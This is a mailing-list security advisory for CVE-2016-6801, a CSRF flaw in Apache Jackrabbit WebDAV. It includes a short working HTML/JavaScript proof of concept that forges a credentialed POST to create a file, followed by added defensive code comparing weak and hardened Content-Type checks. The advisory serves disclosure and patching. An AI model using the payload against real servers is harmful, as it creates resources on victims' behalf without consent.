oss-sec mailing list archives
CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type
From: Julian Reschke <reschke () apache org>
Date: Wed, 14 Sep 2016 14:34:22 +0200
CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Apache Jackrabbit 2.4.5
Apache Jackrabbit 2.6.5
Apache Jackrabbit 2.8.2
Apache Jackrabbit 2.10.3
Apache Jackrabbit 2.12.3
Apache Jackrabbit 2.13.2

Description:
The CSRF content-type check for POST requests does not handle missing
Content-Type header fields, nor variations in field values with respect to
upper/lower case or optional parameters. This can be exploited to create a
resource via CSRF.

Mitigation:
2.4.x users should upgrade to 2.4.5 and apply the patch in
http://svn.apache.org/r1758791, and/or upgrade to 2.4.6 once released.
2.6.x users should upgrade to 2.6.5 and apply the patch in
http://svn.apache.org/r1758771, and/or upgrade to 2.6.6 once released.
2.8.x users should upgrade to 2.8.2 and apply the patch in
http://svn.apache.org/r1758764, and/or upgrade to 2.8.3 once released.
2.10.x users should upgrade to 2.10.4.
2.12.x users should upgrade to 2.12.4.
2.13.x users should upgrade to 2.13.3.

Example:
A resource can be created like so:

<html>
<body>
<script>
function submitRequest() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
  xhr.withCredentials = true;
  var body = "This file has been uploaded via CSRF.=\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
  <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

Credit:
This issue was discovered by Lukas Reschke.
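The three gaps the description names (a missing Content-Type header, case variations, and optional parameters such as a charset) all come down to how a server classifies the content type of a POST before deciding whether the request could have been forged from another origin. The following is an added example, written for this post and not Jackrabbit's own code or the patch referenced above: it places a weak check of the shape the advisory describes beside a hardened one and runs both against a request modelled on the proof of concept, which sends a Blob with no type so the browser attaches no Content-Type header. The function names, the request object shape, the Referer-based origin policy and the host list are all assumptions made for the example.

```javascript
// Added example (not Jackrabbit's code): classifying the Content-Type of a
// POST for a CSRF guard, weak check beside hardened check.

// Media types a browser can send cross-origin from a <form> or XHR without
// a CORS preflight. A POST carrying one of these, or no Content-Type at
// all, may have been forged by a page on another site.
const FORM_MEDIA_TYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

// Weak check: exact, case-sensitive comparison of the raw header value, and
// a missing header counts as "not a form type". "Text/Plain",
// "text/plain; charset=utf-8" and an absent header all slip past it.
function isFormContentTypeWeak(header) {
  return typeof header === "string" && FORM_MEDIA_TYPES.has(header);
}

// Hardened check: a missing or empty header is treated as form-submittable,
// parameters after ";" are dropped, and the media type is compared
// case-insensitively (media types are case-insensitive per RFC 2045).
function isFormContentTypeHardened(header) {
  if (header === undefined || header === null) return true;
  const mediaType = header.split(";")[0].trim().toLowerCase();
  if (mediaType === "") return true;
  return FORM_MEDIA_TYPES.has(mediaType);
}

// Decide whether a POST must be rejected. `req` is a constructed request
// shape: { method, headers: { "content-type"?, referer? } }. `allowedHosts`
// lists hosts whose pages may POST here (assumed policy for this example).
// A POST whose content type a browser could have sent cross-site must come
// from an allowed Referer host; other content types are accepted because a
// cross-origin browser request carrying them would have needed a preflight.
function shouldRejectPost(req, allowedHosts, classify) {
  if (req.method !== "POST") return false;
  if (!classify(req.headers["content-type"])) return false;
  const referer = req.headers["referer"];
  if (typeof referer !== "string") return true;
  let host;
  try {
    host = new URL(referer).host;
  } catch (e) {
    return true; // unparsable Referer: treat as cross-site
  }
  return !allowedHosts.includes(host);
}

const ALLOWED_HOSTS = ["localhost:42427"]; // constructed, matches the PoC target

// Constructed sample modelled on the proof of concept: a Blob without a
// type yields no Content-Type header, and the Referer is a page on some
// other site.
const forgedRequest = {
  method: "POST",
  headers: { referer: "http://other-site.example/csrf.html" },
};

// Run both classifiers against the forged request.
function demo() {
  return {
    weak: shouldRejectPost(forgedRequest, ALLOWED_HOSTS, isFormContentTypeWeak),
    hardened: shouldRejectPost(forgedRequest, ALLOWED_HOSTS, isFormContentTypeHardened),
  };
}

console.log(demo()); // weak: false (accepted), hardened: true (rejected)
```

The weak classifier lets the header-less request through because `undefined` matches nothing in the set; the hardened one treats the absence of a Content-Type exactly like `text/plain`, since a browser can produce either without a preflight, and then falls back to the origin policy. A same-origin form POST with `application/x-www-form-urlencoded` and a Referer on an allowed host still passes.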